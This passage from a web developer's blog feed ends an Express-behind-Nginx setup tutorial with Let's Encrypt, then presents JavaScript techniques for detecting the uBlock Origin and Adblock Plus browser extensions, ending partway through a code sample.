<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3000</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">socket</span><span class="p">.</span><span class="nx">remoteAddress</span><span class="p">;</span>
<span class="nx">ip</span> <span class="o">=</span> <span class="nx">ip</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'::ffff:'</span><span class="p">,</span> <span class="s1">''</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">ip</span> <span class="o">==</span> <span class="s1">'127.0.0.1'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">ip</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">headers</span><span class="p">[</span><span class="s1">'x-real-ip'</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ip</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Hello World from: '</span> <span class="o">+</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">));</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example app listening at http://localhost:</span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
<p>Now you have a functional express server.</p>
<p>Start the server with the command:</p>
<div class="highlight"><pre><span></span><code>node server.js
</code></pre></div>
<h3>Configure Nginx</h3>
<p>The next step is to set up Nginx as a reverse proxy.</p>
<p>Create the Nginx configuration file in <code>/etc/nginx/sites-available/express_nginx.conf</code>:</p>
<div class="highlight"><pre><span></span><code># /etc/nginx/sites-available/express_nginx.conf
server {
listen 80;
server_name test.incolumitas.com;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_cache_bypass $http_upgrade;
}
}
</code></pre></div>
<p>Please change the domain name <strong>test.incolumitas.com</strong> to whatever domain you are using.</p>
<p>Note: The directive <code>proxy_pass</code> tells Nginx to forward all traffic arriving on <code>test.incolumitas.com</code> to the local server listening on <code>http://localhost:3000</code>.</p>
<p>The directive <code>proxy_set_header X-Real-IP $remote_addr;</code> forwards the real IP address of the user in a header <code>X-Real-IP</code> to our Express application.</p>
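<p>The lookup on the Express side can be sketched as a small pure function. This is only a minimal sketch, assuming that Nginx runs on the same host and therefore connects over the loopback interface; the names <code>resolveClientIp</code> and <code>LOOPBACK</code> are hypothetical and not part of Express or Node.js.</p>

```javascript
// Hypothetical helper (illustrative names, not an Express API).
// Assumption: the Nginx reverse proxy runs on the same machine, so a proxied
// request always arrives from a loopback address.
const LOOPBACK = new Set(['127.0.0.1', '::1']);

function resolveClientIp(remoteAddress, headers) {
  // On dual-stack sockets, Node.js reports IPv4 peers as '::ffff:a.b.c.d'
  const peer = String(remoteAddress || '').replace(/^::ffff:/, '');
  // Only trust X-Real-IP if the direct peer is the local proxy.
  // Otherwise any client could set the header and spoof its address.
  if (LOOPBACK.has(peer) && headers['x-real-ip']) {
    return headers['x-real-ip'];
  }
  return peer;
}
```

<p>Inside a route handler this could be called as <code>resolveClientIp(req.socket.remoteAddress, req.headers)</code>. Node.js lower-cases incoming header names, which is why the key is <code>x-real-ip</code>.</p>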
<p>Enable the Nginx configuration file with the command:</p>
<div class="highlight"><pre><span></span><code>ln -s /etc/nginx/sites-available/express_nginx.conf /etc/nginx/sites-enabled/
</code></pre></div>
<p>And then restart the server:</p>
<div class="highlight"><pre><span></span><code>service nginx restart
</code></pre></div>
<p>Now visit the URL <a href="http://test.incolumitas.com">http://test.incolumitas.com</a> in your browser. You should see something like this:</p>
<div class="highlight"><pre><span></span><code>Hello World from: 145.54.78.22
</code></pre></div>
<h3>Deploy an SSL certificate with Let's Encrypt</h3>
<p>In a real production environment, you should of course deploy the web server with SSL support. The DigitalOcean guide on <a href="https://www.digitalocean.com/community/tutorials/how-to-secure-nginx-with-let-s-encrypt-on-ubuntu-18-04">securing Nginx with Let's Encrypt on Ubuntu 18.04</a> shows how to set this up.</p>
<p>Assuming that <code>certbot</code> is correctly installed, you can issue the following command to use SSL:</p>
<div class="highlight"><pre><span></span><code>certbot --nginx -d test.incolumitas.com
</code></pre></div>
<p>You will see the following output. Choose the option <strong>2: Redirect</strong> when prompted.</p>
<div class="highlight"><pre><span></span><code>Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator nginx, Installer nginx
Obtaining a new certificate
Performing the following challenges:
http-01 challenge for test.incolumitas.com
Waiting for verification...
Cleaning up challenges
Deploying Certificate to VirtualHost /etc/nginx/sites-enabled/express_nginx.conf
Please choose whether or not to redirect HTTP traffic to HTTPS, removing HTTP access.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
1: No redirect - Make no further changes to the webserver configuration.
2: Redirect - Make all requests redirect to secure HTTPS access. Choose this for
new sites, or if you're confident your site works on HTTPS. You can undo this
change by editing your web server's configuration.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 2
Redirecting all traffic on port 80 to ssl in /etc/nginx/sites-enabled/express_nginx.conf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Congratulations! You have successfully enabled https://test.incolumitas.com
You should test your configuration at:
https://www.ssllabs.com/ssltest/analyze.html?d=test.incolumitas.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
</code></pre></div>
<p>Then restart the nginx server with</p>
<div class="highlight"><pre><span></span><code>service nginx restart
</code></pre></div>
<p>You can now access your Express application with the URL <a href="https://test.incolumitas.com">https://test.incolumitas.com</a>.</p>
<p>The <code>certbot</code> command modifies your Nginx configuration file to use the SSL certificate. After running it, the file will look something like this:</p>
<div class="highlight"><pre><span></span><code>server {
server_name test.incolumitas.com;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_cache_bypass $http_upgrade;
}
listen 443 ssl; # managed by Certbot
ssl_certificate /etc/letsencrypt/live/test.incolumitas.com/fullchain.pem; # managed by Certbot
ssl_certificate_key /etc/letsencrypt/live/test.incolumitas.com/privkey.pem; # managed by Certbot
include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
}
server {
if ($host = test.incolumitas.com) {
return 301 https://$host$request_uri;
} # managed by Certbot
listen 80;
server_name test.incolumitas.com;
return 404; # managed by Certbot
}
</code></pre></div>Detecting uBlock Origin and Adblock Plus with JavaScript only2020-12-27T20:47:00+01:002022-11-25T22:31:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-27:/2020/12/27/detecting-uBlock-Origin-and-Adblock-Plus-with-JavaScript-only/<p>There are many resources in the Internet that show how to detect uBlock Origin and Adblock Plus. However, after some research, it became clear that most detection methods are unreliable and cease to exist after a while. In this blog article, a reliable detection method for uBlock Origin and Adblock Plus is demonstrated. No external libraries. Just plain and simple JavaScript.</p><p><strong>Edit (25th November 2022):</strong></p>
<p><a href="https://github.com/easylist/easylist/issues/14102">My blog got listed on EasyList</a></p>
<p>Therefore, I had to remove all AdBlock-baiting JavaScript from this blog. This means that the AdBlock detection on this blog <strong>no longer works</strong>.</p>
<p>I am sorry that I can no longer offer AdBlock detection here. I still think that it is valid for publishers to know whether clients are blocking ads. Publishing content is hard work and should be rewarded in some form. Intrusive ads are annoying, and I get why clients block them. But there is some middle ground, I guess.</p>
<hr>
<ul>
<li><a href="https://github.com/NikolaiT/adblock-detect-javascript-only">For the code, visit the GitHub page of this article</a></li>
<li>Alternatively, install the Adblock detection script <a href="https://www.npmjs.com/package/adblock-detect-javascript-only">from npm</a> with the command <code>npm i adblock-detect-javascript-only</code></li>
</ul>
<p>In case this stops working in the coming days or weeks, I will make the selection of the filter dynamic and random. Put differently: If you whitelist a filter such as <code>pp34.js?sv=</code> (uBlock Origin) or <code>&ad_height=</code> (EasyList - uBlock Origin and Adblock Plus), I will pick a random filter / list entry from the following block lists:</p>
<ul>
<li>Adblock EasyList: <a href="https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt">https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt</a></li>
<li>uBlock Origin uAssets: <a href="https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt">https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt</a></li>
</ul>
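<p>Such a random selection could look roughly like the sketch below. It is not part of the published detection script: <code>parseFilterList</code> and <code>pickRandomFilter</code> are hypothetical helper names, and the code assumes that the list text has already been downloaded and that comment lines start with <code>!</code>, as they do in EasyList.</p>

```javascript
// Hypothetical helpers, shown only to illustrate the idea of a random bait filter.
function parseFilterList(text) {
  return text
    .split(/\r?\n/)
    .map((line) => line.trim())
    // drop empty lines, '!' comments and bracketed headers such as '[Adblock Plus 2.0]'
    .filter((line) => line && !line.startsWith('!') && !/^\[.*\]$/.test(line));
}

// rng is injectable so that the selection can be made deterministic in tests
function pickRandomFilter(filters, rng = Math.random) {
  if (filters.length === 0) {
    throw new Error('filter list is empty');
  }
  return filters[Math.floor(rng() * filters.length)];
}
```

<p>A real implementation would additionally have to restrict the choice to filters that can be turned into a loadable script URL, which this sketch does not attempt.</p>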
<script type="text/javascript">
/**
* Author: Nikolai Tschacher
* Updated: 6th November 2022
* Website: https://incolumitas.com/
*
* Detects uBlock Origin, Adblock Plus and AdBlocker Ultimate with JavaScript only.
*
* Usage: detectAdblock().then((res) => { console.log(res) });
*
*/
function detectAdblock() {
const adblockTests = {
// https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt
uBlockOrigin: {
url: 'https://incolumitas.com/data/yzfdmoan.js',
id: '837jlaBksSjd9jh',
},
// https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt
adblockPlus: {
url: 'https://incolumitas.com/data/utep_ad.js',
id: 'hfuBadsf3hFAk',
},
};
function canLoadRemoteScript(obj) {
return new Promise(function (resolve, reject) {
var script = document.createElement('script');
script.onload = function () {
if (document.getElementById(obj.id)) {
resolve(false);
} else {
resolve(true);
}
}
script.onerror = function () {
resolve(true);
}
script.src = obj.url;
document.body.appendChild(script);
});
}
return new Promise(function (resolve, reject) {
let promises = [
canLoadRemoteScript(adblockTests.uBlockOrigin),
canLoadRemoteScript(adblockTests.adblockPlus),
];
Promise.all(promises).then((results) => {
resolve({
uBlockOrigin: results[0],
adblockPlus: results[1],
usingAdblock: (results[0] === true) || (results[1] === true),
});
}).catch((err) => {
reject(err);
});
});
}
detectAdblock().then((res) => {
var ublockEl = document.getElementById('ublock_origin');
var adblockEl = document.getElementById('adblock_plus');
if (res.uBlockOrigin) {
ublockEl.innerHTML = 'You are using uBlock Origin!';
} else {
ublockEl.style.backgroundColor = '#63ff85';
ublockEl.innerHTML = 'You are not using uBlock Origin';
}
if (res.adblockPlus) {
adblockEl.innerHTML = 'You are using Adblock Plus / AdBlocker Ultimate!';
} else {
adblockEl.style.backgroundColor = '#63ff85';
adblockEl.innerHTML = 'You are not using Adblock Plus';
}
});
</script>
<p><strong>Adblock Plus Detected:</strong> <span id="adblock_plus" style="border: 3px #4f4f4f solid;
padding: 10px;
background-color: #ff6363;
margin-top: 20px;
display: block;
width: 300px;"></span></p>
<p><strong>uBlock Origin Detected:</strong> <span id="ublock_origin" style="border: 3px #4f4f4f solid;
padding: 10px;
background-color: #ff6363;
margin-top: 10px;
display: block;
width: 300px;"></span></p>
<h3>Update Adblock / uBlock Origin Detection on August 27th 2022</h3>
<p>This is the <strong>newest</strong> detection code:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> * Author: Nikolai Tschacher</span>
<span class="cm"> * Updated: 6th November 2022</span>
<span class="cm"> * Website: https://incolumitas.com/</span>
<span class="cm"> * </span>
<span class="cm"> * Detects uBlock Origin, Adblock Plus and AdBlocker Ultimate with JavaScript only.</span>
<span class="cm"> * </span>
<span class="cm"> * Usage: detectAdblock().then((res) => { console.log(res) });</span>
<span class="cm"> * </span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">detectAdblock</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">adblockTests</span> <span class="o">=</span> <span class="p">{</span>
<span class="c1">// https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt</span>
<span class="nx">uBlockOrigin</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">url</span><span class="o">:</span> <span class="s1">'https://incolumitas.com/data/yzfdmoan.js'</span><span class="p">,</span>
<span class="nx">id</span><span class="o">:</span> <span class="s1">'837jlaBksSjd9jh'</span><span class="p">,</span>
<span class="p">},</span>
<span class="c1">// https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt</span>
<span class="nx">adblockPlus</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">url</span><span class="o">:</span> <span class="s1">'https://incolumitas.com/data/utep_ad.js'</span><span class="p">,</span>
<span class="nx">id</span><span class="o">:</span> <span class="s1">'hfuBadsf3hFAk'</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">};</span>
<span class="kd">function</span> <span class="nx">canLoadRemoteScript</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="nx">obj</span><span class="p">.</span><span class="nx">id</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">url</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">promises</span> <span class="o">=</span> <span class="p">[</span>
<span class="nx">canLoadRemoteScript</span><span class="p">(</span><span class="nx">adblockTests</span><span class="p">.</span><span class="nx">uBlockOrigin</span><span class="p">),</span>
<span class="nx">canLoadRemoteScript</span><span class="p">(</span><span class="nx">adblockTests</span><span class="p">.</span><span class="nx">adblockPlus</span><span class="p">),</span>
<span class="p">];</span>
<span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">promises</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">results</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">({</span>
<span class="nx">uBlockOrigin</span><span class="o">:</span> <span class="nx">results</span><span class="p">[</span><span class="mf">0</span><span class="p">],</span>
<span class="nx">adblockPlus</span><span class="o">:</span> <span class="nx">results</span><span class="p">[</span><span class="mf">1</span><span class="p">],</span>
<span class="nx">usingAdblock</span><span class="o">:</span> <span class="p">(</span><span class="nx">results</span><span class="p">[</span><span class="mf">0</span><span class="p">]</span> <span class="o">===</span> <span class="kc">true</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="nx">results</span><span class="p">[</span><span class="mf">1</span><span class="p">]</span> <span class="o">===</span> <span class="kc">true</span><span class="p">),</span>
<span class="p">});</span>
<span class="p">}).</span><span class="k">catch</span><span class="p">((</span><span class="nx">err</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">reject</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="p">}</span>
</code></pre></div>
<p>Usage:</p>
<div class="highlight"><pre><span></span><code><span class="nx">detectAdblock</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">res</span><span class="p">)</span> <span class="p">});</span>
</code></pre></div>
<h3>Introduction</h3>
<p><a href="https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm?hl=en">uBlock Origin</a> and <a href="https://adblockplus.org/">Adblock Plus</a> are well-known ad-blocking browser extensions. Adblock software filters advertisement content from websites. Some folks consider the blocking of ads to be unethical, since publishers lose revenue. Other people regard the blocking of advertisements as their right. I personally tend to be on the side of the latter group, since ads are way too obnoxious in general (<a href="https://incolumitas.com/2020/12/16/removing-youtube-ads-from-android-phone/">especially on YouTube</a>).</p>
<p>On the technical side, uBlock Origin and Adblock Plus have a quite straightforward design. They make use of large text-based filter lists and compare the items of those lists with the contents of HTML nodes or URLs. If there is a match, the HTML element is removed or the URL is not loaded. An example of such a list is the well-known <a href="https://easylist-downloads.adblockplus.org/easylist.txt">Easy List</a>. The filter lists for uBlock Origin can be <a href="https://github.com/uBlockOrigin/uAssets/tree/master/filters">found on their GitHub repo</a>.</p>
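<p>To make the matching idea concrete, here is a heavily simplified sketch. The filter entries and the function names <code>isBlockedURL</code> and <code>isBlockedClassName</code> are made up for illustration; real filter lists such as Easy List use a much richer syntax, and the actual extensions are implemented differently.</p>

```javascript
// Hypothetical, heavily simplified filter entries. Real lists such as
// EasyList support wildcards, options and exception rules.
const urlFilters = ['/pagead/js/adsbygoogle.js', '/ads/banner'];
const classFilters = ['adsbox', 'ad-banner'];

// Returns true if the URL contains any of the filter substrings.
function isBlockedURL(url, filters) {
  return filters.some((filter) => url.includes(filter));
}

// Returns true if any class in the space-separated class attribute
// appears on the filter list.
function isBlockedClassName(className, filters) {
  return className.split(/\s+/).some((name) => filters.includes(name));
}
```

<p>With these assumed lists, a URL ending in <code>/pagead/js/adsbygoogle.js</code> would be flagged, while a URL without any listed substring would pass.</p>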
<p>However, sometimes it is necessary to be able to detect that an Adblocker is active. Ideally, the detection should <strong>work by using vanilla JavaScript only</strong>. In this blog post, I will show several different techniques to detect the presence of Adblock software.</p>
<p>All code snippets were tested with <strong>Firefox/84.0</strong> and <strong>Chrome/86.0.4240.75</strong>.
On the Firefox browser, Adblock Plus is running. uBlock Origin is activated on Chrome.</p>
<h3>Attempt 1: Detect Adblock with a baiting div node</h3>
<p>With this technique, the idea is to create a <code>&lt;div&gt;</code> element dynamically and set its class attribute to <code>adsbox</code>. If an Adblocker is active, it should automatically hide or remove this div element, because the class name is flagged as suspicious.</p>
<p>The technique is being used in the <a href="https://github.com/fingerprintjs/fingerprintjs/blob/master/src/sources/adblock.ts">fingerprint.js library</a>.</p>
<p>Try it out by pasting the code below in your browser JavaScript console.</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">detectWithAdsDiv</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">detected</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">ads</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'div'</span><span class="p">);</span>
<span class="nx">ads</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s1">'&nbsp;'</span><span class="p">;</span>
<span class="nx">ads</span><span class="p">.</span><span class="nx">className</span> <span class="o">=</span> <span class="s1">'adsbox'</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">ads</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">node</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="s1">'.adsbox'</span><span class="p">);</span>
<span class="nx">detected</span> <span class="o">=</span> <span class="o">!</span><span class="nx">node</span> <span class="o">||</span> <span class="nx">node</span><span class="p">.</span><span class="nx">offsetHeight</span> <span class="o">===</span> <span class="mf">0</span><span class="p">;</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="nx">ads</span><span class="p">.</span><span class="nx">parentNode</span><span class="p">.</span><span class="nx">removeChild</span><span class="p">(</span><span class="nx">ads</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Using Adblocker: '</span> <span class="o">+</span> <span class="nx">detected</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
<p>This technique did <strong>not work</strong> in either of the tested browsers. Therefore, the above code is obsolete.</p>
<p>I tried the same technique with other <a href="https://stackoverflow.com/questions/4869154/how-to-detect-adblock-on-my-website">CSS class names</a>, but nothing worked reliably.</p>
<h3>Attempt 2: Detect Adblock by downloading suspicious ad scripts</h3>
<p>After some searching on the Internet, I found the <a href="https://jonathanmh.com/how-to-detect-ad-blockers-adblock-ublock-etc/">following blog post</a>.</p>
<p>The idea is the following: The author makes a <code>fetch()</code> request to an advertisement script. If the request gets blocked, there must be an active Adblocker in the background.</p>
<p>For testing purposes, a <code>goodURL</code> is picked that should not get blocked, since it is a widely used JavaScript library for interactive content. On the other hand, the <code>badURL</code> points to a Google Advertising script. The <code>badURL</code> is listed in the Adblock filter list.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">goodURL</span> <span class="o">=</span> <span class="s1">'https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.9.4/Chart.min.js'</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">badURL</span> <span class="o">=</span> <span class="s1">'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'</span><span class="p">;</span>
</code></pre></div>
<p>The code from the mentioned blog post was slightly modified. But essentially, it boils down to the following:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">badURL</span> <span class="o">=</span> <span class="s1">'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'</span><span class="p">;</span>
<span class="p">(</span><span class="kd">function</span> <span class="nx">detectWithFetch</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">myRequest</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Request</span><span class="p">(</span><span class="nx">badURL</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">method</span><span class="o">:</span> <span class="s1">'HEAD'</span><span class="p">,</span>
<span class="nx">mode</span><span class="o">:</span> <span class="s1">'no-cors'</span><span class="p">,</span>
<span class="p">});</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">myRequest</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">response</span> <span class="p">=></span> <span class="nx">response</span><span class="p">.</span><span class="nx">text</span><span class="p">())</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Not Using Adblock'</span><span class="p">);</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">catch</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Using Adblock'</span><span class="p">);</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">finally</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Took '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">t1</span><span class="o">-</span><span class="nx">t0</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="p">})</span>
<span class="p">})();</span>
</code></pre></div>
<p>Unfortunately, this <strong>also does not work reliably</strong>. There are a couple of reasons why the above technique is not ideal:</p>
<ol>
<li>The <code>fetch()</code> API is still not supported in all browsers because it is relatively new</li>
<li><code>fetch()</code> tends to have issues with CORS requests</li>
</ol>
<h3>A first solution: Dynamically creating a <code>&lt;script&gt;</code> tag</h3>
<p>Dynamically creating a <code>&lt;script&gt;</code> tag is a better idea, since <code>&lt;script&gt;</code> tags are supported in every browser
and the issues with CORS and the same origin policy do not apply.</p>
<p>The following solution works reliably in both Firefox and Chrome. Both Adblock plugins could be detected with the snippet below:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">badURL</span> <span class="o">=</span> <span class="s1">'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'</span><span class="p">;</span>
<span class="p">(</span><span class="kd">function</span> <span class="nx">detectWithScriptTag</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"Not using Adblocker, script loaded in "</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">);</span>
<span class="c1">// delete script node</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">parentNode</span><span class="p">.</span><span class="nx">removeChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">};</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s2">"Using Adblocker, script failed to load after "</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">);</span>
<span class="p">}</span>
